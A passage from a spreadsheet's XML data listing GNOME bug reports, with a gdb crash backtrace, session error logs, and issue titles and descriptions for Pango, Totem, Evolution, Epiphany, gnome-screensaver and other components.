    v_pointer = 0xb7bfefe5} {v_int = 1079333568 v_long = 1079333568 
    v_int64 = -4616391205560429888 v_double = -0.97761929097267597 
    v_pointer = 0x405552c0}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 3083066398 data = {{v_int = 134729296 
      v_uint = 134729296 v_long = 134729296 v_ulong = 134729296 
      v_int64 = -5204727886979281328 v_uint64 = 13242016186730270288 
      v_float = 4.08676039e-34 v_double = -4.8424952390302665e-40 
      v_pointer = 0x807ce50} {v_int = -1074837288 v_uint = 3220130008 
      v_long = -1074837288 v_ulong = 3220130008 
      v_int64 = -5205070094003124008 v_uint64 = 13241673979706427608 
      v_float = -1.86941051 v_double = -4.5633696113226268e-40 
      v_pointer = 0xbfef48d8}}}
	error = 
	instance_and_params = (GValue *) 0xbfef46ec
	stack_values = {{g_type = 134859496 data = {{v_int = 134630176 
        v_uint = 134630176 v_long = 134630176 v_ulong = 134630176 
        v_int64 = 134630176 v_uint64 = 134630176 v_float = 4.04124672e-34 
        v_double = 6.651614485516069e-316 v_pointer = 0x8064b20} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 134729296 data = {{v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = -4616392787187728383 
        v_uint64 = 13830351286521823233 v_float = 1.40129846e-45 
        v_double = -0.97744369506835949 v_pointer = 0x1} {
        v_int = -1211820144 v_uint = 3083147152 v_long = -1211820144 
        v_ulong = 3083147152 v_int64 = -5239727108669499504 
        v_uint64 = 13207016965040052112 v_float = -2.34952022e-05 
        v_double = -2.2196413283714892e-42 v_pointer = 0xb7c51790}}} {
    g_type = 3075003584 data = {{v_int = 134924688 v_uint = 134924688 
        v_long = 134924688 v_ulong = 134924688 
        v_int64 = -4616392787052803696 v_uint64 = 13830351286656747920 
        v_float = 4.17648e-34 v_double = -0.9774437100480089 
        v_pointer = 0x80ac990} {v_int = -1220789774 v_uint = 3074177522 
        v_long = -1220789774 v_ulong = 3074177522 
        v_int64 = -5239704242272585230 v_uint64 = 13207039831436966386 
        v_float = -1.12191647e-05 v_double = -2.226926982763664e-42 
        v_pointer = 0xb73c39f2}}} {g_type = 134924688 data = {{
        v_int = -1219145024 v_uint = 3075822272 v_long = -1219145024 
        v_ulong = 3075822272 v_int64 = 579497125458825920 
        v_uint64 = 579497125458825920 v_float = -1.27150561e-05 
        v_double = 6.3381700132207843e-270 v_pointer = 0xb75552c0} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = -4616392649748774911 v_uint64 = 13830351423960776705 
        v_float = 1.40129846e-45 v_double = -0.97745895385742199 
        v_pointer = 0x1}}} {g_type = 3075431985 data = {{v_int = 134924688 
        v_uint = 134924688 v_long = 134924688 v_ulong = 134924688 
        v_int64 = 7785254052409559440 v_uint64 = 7785254052409559440 
        v_float = 4.17648e-34 v_double = 2.817177815864993e+212 
        v_pointer = 0x80ac990} {v_int = -1212127676 v_uint = 3082839620 
        v_long = -1212127676 v_ulong = 3082839620 
        v_int64 = -4616392303068551612 v_uint64 = 13830351770641000004 
        v_float = -2.29358047e-05 v_double = -0.97749744309403086 
        v_pointer = 0xb7c06644}}} {g_type = 3086051307 data = {{
        v_int = -1212098674 v_uint = 3082868622 v_long = -1212098674 
        v_ulong = 3082868622 v_int64 = -5205901281981311090 
        v_uint64 = 13240842791728240526 v_float = -2.29885591e-05 
        v_double = -3.8854002828462735e-40 v_pointer = 0xb7c0d78e} {
        v_int = -1211898602 v_uint = 3083068694 v_long = -1211898602 
        v_ulong = 3083068694 v_int64 = 579497125466072342 
        v_uint64 = 579497125466072342 v_float = -2.33524879e-05 
        v_double = 6.3381700193121928e-270 v_pointer = 0xb7c3e516}}} {
    g_type = 1824544692 data = {{v_int = -1212121468 v_uint = 3082845828 
        v_long = -1212121468 v_ulong = 3082845828 
        v_int64 = -4616392165629591932 v_uint64 = 13830351908079959684 
        v_float = -2.2947097e-05 v_double = -0.97751270188378259 
        v_pointer = 0xb7c07e84} {v_int = -1208915989 v_uint = 3086051307 
        v_long = -1208915989 v_ulong = 3086051307 
        v_int64 = -5205921811921803285 v_uint64 = 13240822261787748331 
        v_float = -2.87778294e-05 v_double = -3.8686547687935905e-40 
        v_pointer = 0xb7f167eb}}} {g_type = 3082874161 data = {{
        v_int = -1212132380 v_uint = 3082834916 v_long = -1212132380 
        v_ulong = 3082834916 v_int64 = -5205985158397668380 
        v_uint64 = 13240758915311883236 v_float = -2.29272482e-05 
        v_double = -3.8169853885442824e-40 v_pointer = 0xb7c053e4} {
        v_int = -1212126364 v_uint = 3082840932 v_long = -1212126364 
        v_ulong = 3082840932 v_int64 = 1075110246613019492 
        v_uint64 = 1075110246613019492 v_float = -2.29381913e-05 
        v_double = 8.4643765394856504e-237 v_pointer = 0xb7c06b64}}} {
    g_type = 3082874161 data = {{v_int = 12922480 v_uint = 12922480 
        v_long = 12922480 v_ulong = 12922480 v_int64 = 343610306160 
        v_uint64 = 343610306160 v_float = 1.81082514e-38 
        v_double = 1.6976604783064886e-312 v_pointer = 0xc52e70} {
        v_int = -1211032200 v_uint = 3083935096 v_long = -1211032200 
        v_ulong = 3083935096 v_int64 = -5206068927438709384 
        v_uint64 = 13240675146270842232 v_float = -2.4928464e-05 
        v_double = -3.7486580763211805e-40 v_pointer = 0xb7d11d78}}} {
    g_type = 3082854420 data = {{v_int = -1212080002 v_uint = 3082887294 
        v_long = -1212080002 v_ulong = 3082887294 v_int64 = 3082887294 
        v_uint64 = 3082887294 v_float = -2.30225232e-05 
        v_double = 1.5231487019658829e-314 v_pointer = 0xb7c1207e} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = -5243248984935366656 v_uint64 = 13203495088774184960 
        v_float = 0 v_double = -1.2662182188038183e-42 v_pointer = 0x0}}} {
    g_type = 3067809340 data = {{v_int = 18 v_uint = 18 v_long = 18 
        v_ulong = 18 v_int64 = -5191999511014146030 
        v_uint64 = 13254744562695405586 v_float = 2.52233724e-44 
        v_double = -3.3634414156232961e-39 v_pointer = 0x12} {
        v_int = -1211031772 v_uint = 3083935524 v_long = -1211031772 
        v_ulong = 3083935524 v_int64 = -4616391444073996508 
        v_uint64 = 13830352629635555108 v_float = -2.49292425e-05 
        v_double = -0.97759281064734127 v_pointer = 0xb7d11f24}}} {
    g_type = 3220129924 data = {{v_int = -1208915193 v_uint = 3086052103 
        v_long = -1208915193 v_ulong = 3086052103 
        v_int64 = -4616391444071879929 v_uint64 = 13830352629637671687 
        v_float = -2.87792773e-05 v_double = -0.97759281088232874 
        v_pointer = 0xb7f16b07} {v_int = -1208854960 v_uint = 3086112336 
        v_long = -1208854960 v_ulong = 3086112336 v_int64 = 80395523664 
        v_uint64 = 80395523664 v_float = -2.88888405e-05 
        v_double = 3.972066632179938e-313 v_pointer = 0xb7f25650}}} {
    g_type = 0 data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = 1 v_uint64 = 1 v_float = 1.40129846e-45 
        v_double = 4.9406564584124654e-324 v_pointer = 0x1} {
        v_int = -1219963656 v_uint = 3075003640 v_long = -1219963656 
        v_ulong = 3075003640 v_int64 = 71794480376 v_uint64 = 71794480376 
        v_float = -1.19705146e-05 v_double = 3.5471186314805141e-313 
        v_pointer = 0xb748d4f8}}} {g_type = 3075003592 data = {{
        v_int = -1211032200 v_uint = 3083935096 v_long = -1211032200 
        v_ulong = 3083935096 v_int64 = -5205901281980244616 
        v_uint64 = 13240842791729307000 v_float = -2.4928464e-05 
        v_double = -3.885400283716157e-40 v_pointer = 0xb7d11d78} {
        v_int = 127247059 v_uint = 127247059 v_long = 127247059 
        v_ulong = 127247059 v_int64 = 2197185136796371 
        v_uint64 = 2197185136796371 v_float = 2.25147277e-34 
        v_double = 1.0855536936440867e-308 v_pointer = 0x795a2d3}}} {
    g_type = 0 data = {{v_int = -1074837480 v_uint = 3220129816 
        v_long = -1074837480 v_ulong = 3220129816 
        v_int64 = -5205103315575158760 v_uint64 = 13241640758134392856 
        v_float = -1.86938763 v_double = -4.5362720022685891e-40 
        v_pointer = 0xbfef4818} {v_int = -1074837328 v_uint = 3220129968 
        v_long = -1074837328 v_ulong = 3220129968 
        v_int64 = -5201343690182801232 v_uint64 = 13245400383526750384 
        v_float = -1.86940575 v_double = -7.858879404585702e-40 
        v_pointer = 0xbfef48b0}}} {g_type = 3082874161 data = {{
        v_int = 250318610 v_uint = 250318610 v_long = 250318610 
        v_ulong = 250318610 v_int64 = 579494305134776082 
        v_uint64 = 579494305134776082 v_float = 5.80697444e-30 
        v_double = 6.335799223055455e-270 v_pointer = 0xeeb8f12} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 8589934592 
        v_uint64 = 8589934592 v_float = 0 
        v_double = 4.2439915819305446e-314 v_pointer = 0x0}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbfef4700
	node = (SignalNode *) 0x80a48a8
	i = 3075496873
	n_params = 0
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#19 0xb7578379 in IA__g_signal_emit (instance=0x8064b20 signal_id=98 
    detail=0) at gsignal.c:2243
	var_args = 0xbfef492c |KÃ¯Â¿ÃIÃ¯Â¿Â¨Ãƒ\n\bÃ\n\b\b\220\027Ã…Â·\020JÃ¯Â¿\020JÃ¯Â¿hIÃ¯Â¿!Ã‹ÃŒÂ·4K\006\bÃ€Ãˆ\n\b|KÃ¯Â¿\034Ã‚ÃƒÂ·Ã´Â¿HÂ·Ã€Ã”HÂ·\210IÃ¯Â¿\027\fÃƒÂ·4K\006\b
#20 0xb7ddc6a7 in impl_Bonobo_Control_setFrame (servant=0x8064b34 
    frame=0x80ac8c0 ev=0xbfef4b7c) at bonobo-control.c:434
	control = (BonoboControl *) 0x8064b20
#21 0xb7cccb21 in _ORBIT_skel_small_Bonobo_Control_setFrame (
    _o_servant=0x8064b34 _o_retval=0x0 _o_args=0xbfef4a10 
    _o_ctx=0xbfef4a6c _o_ev=0xbfef4b7c 
    _impl_setFrame=0xb7ddc600 )
    at Bonobo-common.c:584
No locals.
#22 0xb7c30c17 in ORBit_POAObject_invoke (pobj=0x80aa8e0 ret=0x0 
    args=0xbfef4a10 ctx=0xbfef4a6c data=0xbfef4ae8 ev=0xbfef4b7c)
    at poa.c:1142
No locals.
#23 0xb7c36e65 in ORBit_OAObject_invoke (adaptor_obj=0x80aa8e0 ret=0x0 
    args=0xbfef4a10 ctx=0xbfef4a6c data=0xbfef4ae8 ev=0xbfef4b7c)
    at orbit-adaptor.c:336
No locals.
#24 0xb7c23da9 in ORBit_small_invoke_adaptor (adaptor_obj=0x80aa8e0 
    recv_buffer=0x80ac3a8 m_data=0xb7cef300 data=0xbfef4ae8 ev=0xbfef4b7c)
    at orbit-small.c:844
	p = (gpointer) 0xbfef49d0
	a = 
	ctx = {parent = {interface = 0xb7c51790 refs = 134744896} 
  mappings = 0xb7497e17 children = 0xbfef4a98 
  the_name = 0xb7c51790 pÃ¥\004 parent_ctx = 0x8080ad0}
	args = (gpointer *) 0xbfef4a10
	scratch = (gpointer *) 0xbfef49f0
	pretval = (gpointer) 0x0
	retval = (gpointer) 0x0
	send_buffer = 
	orb = (CORBA_ORB) 0x8080ad0
	tc = (CORBA_TypeCode) 0xbfef4a10
	i = 
#25 0xb7c34a9a in ORBit_POAObject_handle_request (pobj=0x80aa8e0 
    opname=0x80ac454 setFrame ret=0x0 args=0x0 ctx=0x0 
    recv_buffer=0x80ac3a8 ev=0xbfef4b7c) at poa.c:1351
	invoke_data = {
  small_skel = 0xb7cccb00  
  imp = 0xb7ddc600}
	poa = (PortableServer_POA) 0x8080b40
	cookie = (PortableServer_ServantLocator_Cookie) 0x0
	oid = (PortableServer_ObjectId *) 0x80aa9bc
	m_data = (ORBit_IMethod *) 0xb7cef300
	small_skel = (
    ORBitSmallSkeleton) 0xb7cccb00 
	imp = (gpointer) 0xb7ddc600
	__PRETTY_FUNCTION__ = ORBit_POAObject_handle_request
#26 0xb7c3512c in ORBit_POAObject_invoke_incoming_request (pobj=0x80aa8e0 
    recv_buffer=0x80ac3a8 opt_ev=0xbfef4b7c) at poa.c:1421
	opname = 
	real_ev = {_id = 0xbfef4b58 Â¸KÃ¯Â¿Ã‹[ÃƒÂ·Ã Â¨\n\bÂ¨Ãƒ\n\b|KÃ¯Â¿ 
  _major = 3083017625 _any = {_type = 0x80aa8e0 _value = 0xbfef4b90 
    _release = 88 'X'}}
	ev = (CORBA_Environment *) 0xbfef4b7c
#27 0xb7c35bcb in ORBit_POA_handle_request (poa=0x8080b40 
    recv_buffer=0x80ac3a8 objkey=0x80ac3c0) at poa.c:1643
	pobj = (ORBit_POAObject) 0x80aa8e0
	env = {_id = 0x0 _major = 0 _any = {_type = 0x0 _value = 0x0 
    _release = 0 '\0'}}
	object_id = {_maximum = 8 _length = 8 _buffer = 0x80ac448 \a 
  _release = 0 '\0'}
	__PRETTY_FUNCTION__ = ORBit_POA_handle_request
#28 0xb7c37003 in ORBit_handle_request (orb=0x8080ad0 recv_buffer=0x80ac3a8)
    at orbit-adaptor.c:296
	forw_obj = 
	objkey = (ORBit_ObjectKey *) 0x80ac3c0
	adaptor = (ORBit_ObjectAdaptor) 0x8080b40
#29 0xb7c20138 in giop_connection_handle_input (lcnx=0x807ce10)
    at giop-recv-buffer.c:1308
	buf = (GIOPRecvBuffer *) 0x80ac3a8
	cnx = 
	__PRETTY_FUNCTION__ = giop_connection_handle_input
#30 0xb7c3dd4d in link_connection_io_handler (gioc=0x0 
    condition= data=0x807ce10) at linc-connection.c:1387
	rv = 
	n = 
	n_size = 
	cnx = 
#31 0xb7c40bb0 in link_source_dispatch (source=0x80ac2a0 
    callback=0xb7c3dc70  user_data=0x807ce10)
    at linc-source.c:159
No locals.
#32 0xb74eea31 in IA__g_main_context_dispatch (context=0x807ff08)
    at gmain.c:2045
No locals.
#33 0xb74f1aa6 in g_main_context_iterate (context=0x807ff08 block=1 
    dispatch=1 self=0x805c560) at gmain.c:2677
	got_ownership = 
	max_priority = 2147483647
	timeout = 430
	some_ready = 1
	nfds = 
	allocated_nfds = 
	fds = (GPollFD *) 0x808a440
	__PRETTY_FUNCTION__ = g_main_context_iterate
#34 0xb74f1e67 in IA__g_main_loop_run (loop=0x80897c8) at gmain.c:2881
	got_ownership = -1219920384
	self = (GThread *) 0x805c560
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#35 0xb7cb78c3 in bonobo_main () at bonobo-main.c:311
	loop = (GMainLoop *) 0x80897c8
#36 0xb7cb5b2b in bonobo_generic_factory_main_timeout (
    act_iid=0x8089620 :0.0OAFIID:GNOME_MainMenu_Factory 
    factory_cb=0xb7f03e50  
    user_data=0x8089610 quit_timeout=2000) at bonobo-generic-factory.c:412
	context = (BonoboObject *) 0x80644f0
	factory = (BonoboGenericFactory *) 0x80645b0
#37 0xb7cb5bb4 in bonobo_generic_factory_main (
    act_iid=0x8089620 :0.0OAFIID:GNOME_MainMenu_Factory 
    factory_cb=0xb7f03e50  
    user_data=0x8089610) at bonobo-generic-factory.c:369
No locals.
#38 0xb7f046b1 in panel_applet_factory_main_closure (
    iid=0x805934e OAFIID:GNOME_MainMenu_Factory applet_type=134780120 
    closure=0x8089598) at panel-applet.c:1757
	retval = 
	display_iid = 0x8089620 :0.0OAFIID:GNOME_MainMenu_Factory
	data = (PanelAppletCallBackData *) 0x8089610
	__PRETTY_FUNCTION__ = panel_applet_factory_main_closure
#39 0xb7f04793 in panel_applet_factory_main (
    iid=0x805934e OAFIID:GNOME_MainMenu_Factory applet_type=134780120 
    callback=0x8051430  data=0x0)
    at panel-applet.c:1781
	closure = 
	__PRETTY_FUNCTION__ = panel_applet_factory_main
#40 0x08051403 in main (argc=) at main-menu.c:34
	program = (GnomeProgram *) 0x8065810
	context = 
	retval = 
#0  0xb749c20e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors (432 sec old) ---------------------
Run GNOME with a session DBUS using jhbuild
SESSION_MANAGER=local/elin:/tmp/.ICE-unix/2595
(gnome-session:2595): GLib-GObject-CRITICAL **: g_object_unref: assertion `G_IS_OBJECT (object)' failed
Windowmanager waarschuwing:Werkoplossing voor gebroken toepassingen uitgezet. Bepaalde toepassingen zullen niet naar behoren functioneren.
** (gsynaptics-init:2628): WARNING **: Using synclient
Unknown parameter CoastingSpeedThreshold
(nautilus:2627): Liboobs-WARNING **: There was an unknown error communicating with the backends: The name org.freedesktop.SystemToolsBackends was not provided by any .service files
(nautilus:2627): Liboobs-WARNING **: There was an unknown error communicating with the backends: The name org.freedesktop.SystemToolsBackends was not provided by any .service files
Initializing nautilus-open-terminal extension
** Message: 	U bent nu verbonden met het bekabelde netwerk.
--------------------------------------------------</t>
  </si>
  <si>
    <t>jimmyk</t>
  </si>
  <si>
    <t>PANGO-149643</t>
  </si>
  <si>
    <t>pango-basic-win32 doesn't always load metrics? (Symbol font)</t>
  </si>
  <si>
    <t>* pango-1.4.0 from http://www.gimp.org/~tml/gimp/win32/downloads.html
* With PyGTK:
import gtk
import pango
fd = pango.FontDescription(symbol 12)
w = gtk.Window()
f = w.get_pango_context().load_font(fd)
f.get_metrics()
Results in:
(:2868): GLib-GObject-CRITICAL **: file gobject.c: line 1561 (g_object_ref):
assertion `G_IS_OBJECT (object)' failed
** (:2868): CRITICAL **: file pango-engine.c: line 68
(_pango_engine_shape_shape): assertion `PANGO_IS_FONT (font)' failed
Or when you set the font for a widget to Symbol you get this message box:
** Error: ** file shape.c: line 75 (pango_shape): assertion failed:
(glyphs-&gt;num_glyphs &gt; 0)
aborting...
This only seems to happen with fonts that contain symbols such as Symbol and
Wingdings.</t>
  </si>
  <si>
    <t>gnome.3.dkturner</t>
  </si>
  <si>
    <t>TOTEM-337232</t>
  </si>
  <si>
    <t>Totem screen gets smaller when repeatedly hididing/showing controls</t>
  </si>
  <si>
    <t>Please describe the problem:
When repeatedly hiding/showing controls in a window that plays a movie that has
been stretched over original resolution the window gets smaller when following
the steps described.
Steps to reproduce:
1. Open a movie / start playing
2. Hit H repeatedly
Actual results:
Each hide show cycle makes the window smaller. Hide retains the original size
but show tries to fit the controls in the new smaller space.
Expected results:
When hiding controls I (intuitively) expect that the size left will be taken
over by the content.
When a user resizes a window it means that he wants it to fit on some size. I
understand that keeping the content size when hiding controls is meant to be
less disruptive but the combined user experience is frustrating.
Does this happen every time?
Only happens when movies are streched above their native resolution.
Other information:
Distibution: suse 10.0
Backend: Xine-lib</t>
  </si>
  <si>
    <t>kcorax</t>
  </si>
  <si>
    <t>BAKERY-441220</t>
  </si>
  <si>
    <t>BAKERY</t>
  </si>
  <si>
    <t>Build with reduced API</t>
  </si>
  <si>
    <t>It should be possible to build bakery with reduced glibmm API to be used on performance-critical devices.</t>
  </si>
  <si>
    <t>bakery-maint</t>
  </si>
  <si>
    <t>GNOME-VFS-129498</t>
  </si>
  <si>
    <t>gnome-vfs schemas messages inconsistent</t>
  </si>
  <si>
    <t>The common style in GNOME is to have all  schemas messages have no
period at the end. Instead all  schemas messages are supposed to have
one. It seems
schemas/desktop_gnome_url_handlers.schemas.in
schemas/system_http_proxy.schemas.in
in gnome-vfs currently breaks that style as no schemas messages or very few
end in a period. The  ones probably should.</t>
  </si>
  <si>
    <t>BATTFINK-111951</t>
  </si>
  <si>
    <t>BATTFINK</t>
  </si>
  <si>
    <t>HIGification of Preferences Dialog</t>
  </si>
  <si>
    <t>Hi Glynn
I am attaching a patch for battfink.  It's a small patch that corrects
widget padding / layout according to the HIG.</t>
  </si>
  <si>
    <t>EPIPHANY-171179</t>
  </si>
  <si>
    <t>Controls</t>
  </si>
  <si>
    <t>Undo for location entry</t>
  </si>
  <si>
    <t>Distribution/Version: Ubuntu Hoary preview
Steps to reproduce:
1.  Type some stuff in the address field.
2.  Press Escape.
What should happen:
*   The contents of the field reverts to the URL of the current page.
What actually happens:
*   Nothing.</t>
  </si>
  <si>
    <t>EVOLUTION-201392</t>
  </si>
  <si>
    <t>Timezone picker</t>
  </si>
  <si>
    <t>We need a GUI to pick timezones.  Perhaps we can/should reuse the one in Ximian
Setup Tools.</t>
  </si>
  <si>
    <t>EVOLUTION-200910</t>
  </si>
  <si>
    <t>Birthday picker calendar does not close on day click</t>
  </si>
  <si>
    <t>The pop-up calendar that lets you pick birthdays in the contact editor does not
close when you click on a day. You have to double-click and this is annoying. 
Escape works Enter should too.</t>
  </si>
  <si>
    <t>GNOME-SCREENSAVER-330724</t>
  </si>
  <si>
    <t>GNOME Screensaver fails to show unlock dialog</t>
  </si>
  <si>
    <t>We have multiple 64bit machines that don't show the unlock dialog this is https://bugzilla.novell.com/show_bug.cgi?id=148379https://bugzilla.novell.com/show_bug.cgi?id=148379https://bugzilla.novell.com/show_bug.cgi?id=148379https://bugzilla.novell.com/show_bug.cgi?id=148379
Debug output from an unlock attempt:
jpr@linux:~&gt; gnome-screensaver --no-daemon --debug
[gs_debug_init] gs-debug.c:95 (14:30:33):        Debugging enabled
[main] gnome-screensaver.c:87 (14:30:33):        initializing gnome-screensaver 0.0.25
[initialize_server_extensions] gs-watcher-x11.c:1033 (14:30:33):         Not using server's MIT-SCREEN-SAVER extension.
[gs_watcher_set_active] gs-watcher-x11.c:759 (14:30:33):         turning watcher: ON
[_gs_watcher_notice_activity] gs-watcher-x11.c:560 (14:30:33):   Activity detected: resetting timers
[add_idle_timer] gs-watcher-x11.c:473 (14:30:33):        starting idle_timer (590000 9)
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (14:30:33):   Idle 0 seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (14:30:33):         checking wall clock for hibernation changed: 0:00:00
[_gs_watcher_set_active_internal] gs-watcher-x11.c:746 (14:30:33):       Starting idle watcher
[_gs_watcher_notice_activity] gs-watcher-x11.c:560 (14:30:35):   Activity detected: resetting timers
[remove_idle_timer] gs-watcher-x11.c:460 (14:30:35):     killing idle_timer  (600000 9)
[add_idle_timer] gs-watcher-x11.c:473 (14:30:35):        starting idle_timer (590000 13)
[_gs_watcher_notice_activity] gs-watcher-x11.c:560 (14:30:35):   Activity detected: resetting timers
[remove_idle_timer] gs-watcher-x11.c:460 (14:30:35):     killing idle_timer  (600000 13)
[add_idle_timer] gs-watcher-x11.c:473 (14:30:35):        starting idle_timer (590000 14)
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (14:30:35):   Idle 0 seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (14:30:35):         checking wall clock for hibernation changed: 0:00:02
[_gs_watcher_notice_activity] gs-watcher-x11.c:560 (14:30:35):   Activity detected: resetting timers
[remove_idle_timer] gs-watcher-x11.c:460 (14:30:35):     killing idle_timer  (600000 14)
[add_idle_timer] gs-watcher-x11.c:473 (14:30:35):        starting idle_timer (590000 15)
[gs_watcher_set_active] gs-watcher-x11.c:759 (14:30:35):         turning watcher: OFF
[remove_idle_timer] gs-watcher-x11.c:460 (14:30:35):     killing idle_timer  (600000 15)
[_gs_watcher_set_active_internal] gs-watcher-x11.c:742 (14:30:35):       Stopping idle watcher
[gs_grab_get_keyboard] gs-grab-x11.c:164 (14:30:35):     Grabbing keyboard widget=45
[gs_grab_get_mouse] gs-grab-x11.c:190 (14:30:35):        Grabbing mouse widget=45
[gs_grab_release_mouse] gs-grab-x11.c:221 (14:30:35):    Ungrabbing pointer
[gs_fade_set_active] gs-fade.c:498 (14:30:35):   Setting fade: ON
[gs_fade_set_active] gs-fade.c:498 (14:30:36):   Setting fade: OFF
[gs_window_clear] gs-window-x11.c:219 (14:30:36):        Clearing window
[clear_all_children] gs-window-x11.c:200 (14:30:36):     Clearing all child windows
[gs_window_raise] gs-window-x11.c:395 (14:30:36):        Raising screensaver window
[xorg_lock_smasher_set_active] gs-grab-x11.c:109 (14:30:36):     Disabling the x.org grab smasher
[xorg_lock_smasher_set_active] gs-grab-x11.c:128 (14:30:36):     XF86MiscSetGrabKeysState(off) returned MiscExtGrabStateSuccess
[gs_grab_move_keyboard] gs-grab-x11.c:287 (14:30:36):    Moving keyboard grab from 45 to 3600006
[gs_grab_move_keyboard] gs-grab-x11.c:289 (14:30:36):    *** doing X server grab
[gs_grab_release_keyboard] gs-grab-x11.c:209 (14:30:36):         Ungrabbing keyboard
[gs_grab_get_keyboard] gs-grab-x11.c:164 (14:30:36):     Grabbing keyboard widget=3600006
[gs_grab_move_keyboard] gs-grab-x11.c:310 (14:30:36):    *** releasing X server grab
[gs_grab_move_mouse] gs-grab-x11.c:240 (14:30:36):       Intentionally skipping move pointer grabs
[gs_window_raise] gs-window-x11.c:395 (14:30:36):        Raising screensaver window
[xorg_lock_smasher_set_active] gs-grab-x11.c:109 (14:30:36):     Disabling the x.org grab smasher
[xorg_lock_smasher_set_active] gs-grab-x11.c:128 (14:30:36):     XF86MiscSetGrabKeysState(off) returned MiscExtGrabStateAlready
[gs_grab_move_keyboard] gs-grab-x11.c:281 (14:30:36):    Window 3600006 is already grabbed skipping
[gs_grab_move_mouse] gs-grab-x11.c:240 (14:30:36):       Intentionally skipping move pointer grabs
[gs_window_request_unlock] gs-window-x11.c:927 (14:30:39):       Requesting unlock
[window_dialog_up_cb] gs-manager.c:688 (14:30:39):       Handling dialog up
[xorg_lock_smasher_set_active] gs-grab-x11.c:109 (14:30:39):     Disabling the x.org grab smasher
[xorg_lock_smasher_set_active] gs-grab-x11.c:128 (14:30:39):     XF86MiscSetGrabKeysState(off) returned MiscExtGrabStateAlready
[gs_grab_move_keyboard] gs-grab-x11.c:281 (14:30:39):    Window 3600006 is already grabbed skipping
[gs_grab_move_mouse] gs-grab-x11.c:240 (14:30:39):       Intentionally skipping move pointer grabs
[window_dialog_up_cb] gs-manager.c:704 (14:30:39):       Suspending jobs
[popup_dialog_idle] gs-window-x11.c:888 (14:30:39):      Popping up dialog
[gs_window_clear] gs-window-x11.c:219 (14:30:39):        Clearing window
[clear_all_children] gs-window-x11.c:200 (14:30:39):     Clearing all child windows
[gs_window_request_unlock] gs-window-x11.c:927 (14:30:39):       Requesting unlock
[gs_window_request_unlock] gs-window-x11.c:927 (14:30:39):       Requesting unlock
[gs_window_request_unlock] gs-window-x11.c:927 (14:30:39):       Requesting unlock
GLib-GObject-ERROR **: file gtype.c: line 1381 (type_iface_peek_holder_L): assertion failed: (NODE_IS_IFACE (iface))
aborting...
[gs_window_dialog_finish] gs-window-x11.c:730 (14:30:39):        Dialog finished
[gs_window_clear] gs-window-x11.c:219 (14:30:39):        Clearing window
[clear_all_children] gs-window-x11.c:200 (14:30:39):     Clearing all child windows
[gs_window_request_unlock] gs-window-x11.c:927 (14:30:39):       Requesting unlock
[window_dialog_up_cb] gs-manager.c:688 (14:30:39):       Handling dialog up
[xorg_lock_smasher_set_active] gs-grab-x11.c:109 (14:30:39):     Disabling the x.org grab smasher
[xorg_lock_smasher_set_active] gs-grab-x11.c:128 (14:30:39):     XF86MiscSetGrabKeysState(off) returned MiscExtGrabStateAlready
[gs_grab_move_keyboard] gs-grab-x11.c:281 (14:30:39):    Window 3600006 is already grabbed skipping
[gs_grab_move_mouse] gs-grab-x11.c:240 (14:30:39):       Intentionally skipping move pointer grabs
[window_dialog_up_cb] gs-manager.c:704 (14:30:39):       Suspending jobs
[popup_dialog_idle] gs-window-x11.c:888 (14:30:39):      Popping up dialog
[gs_window_clear] gs-window-x11.c:219 (14:30:39):        Clearing window
[clear_all_children] gs-window-x11.c:200 (14:30:39):     Clearing all child windows
[gs_window_request_unlock] gs-window-x11.c:927 (14:30:39):       Requesting unlock
[gs_window_request_unlock] gs-window-x11.c:927 (14:30:39):       Requesting unlock
GLib-GObject-ERROR **: file gtype.c: line 1381 (type_iface_peek_holder_L): assertion failed: (NODE_IS_IFACE (iface))
aborting...
[gs_window_dialog_finish] gs-window-x11.c:730 (14:30:39):        Dialog finished
[gs_window_clear] gs-window-x11.c:219 (14:30:39):        Clearing window
[clear_all_children] gs-window-x11.c:200 (14:30:39):     Clearing all child windows
[gs_window_request_unlock] gs-window-x11.c:927 (14:30:40):       Requesting unlock
[window_dialog_up_cb] gs-manager.c:688 (14:30:40):       Handling dialog up
[xorg_lock_smasher_set_active] gs-grab-x11.c:109 (14:30:40):     Disabling the x.org grab smasher
[xorg_lock_smasher_set_active] gs-grab-x11.c:128 (14:30:40):     XF86MiscSetGrabKeysState(off) returned MiscExtGrabStateAlready
[gs_grab_move_keyboard] gs-grab-x11.c:281 (14:30:40):    Window 3600006 is already grabbed skipping
[gs_grab_move_mouse] gs-grab-x11.c:240 (14:30:40):       Intentionally skipping move pointer grabs
[window_dialog_up_cb] gs-manager.c:704 (14:30:40):       Suspending jobs
[popup_dialog_idle] gs-window-x11.c:888 (14:30:40):      Popping up dialog
[gs_window_clear] gs-window-x11.c:219 (14:30:40):        Clearing window
[clear_all_children] gs-window-x11.c:200 (14:30:40):     Clearing all child windows
[gs_window_request_unlock] gs-window-x11.c:927 (14:30:40):       Requesting unlock
GLib-GObject-ERROR **: file gtype.c: line 1381 (type_iface_peek_holder_L): assertion failed: (NODE_IS_IFACE (iface))
aborting...
[gs_window_dialog_finish] gs-window-x11.c:730 (14:30:40):        Dialog finished
[gs_window_clear] gs-window-x11.c:219 (14:30:40):        Clearing window
[clear_all_children] gs-window-x11.c:200 (14:30:40):     Clearing all child windows</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-172704</t>
  </si>
  <si>
    <t>Accuracy keyboard shortcut broken</t>
  </si>
  <si>
